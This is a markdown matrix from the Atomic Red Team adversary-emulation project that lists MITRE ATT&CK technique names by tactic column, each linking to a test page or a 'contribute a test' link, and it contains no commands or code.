| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
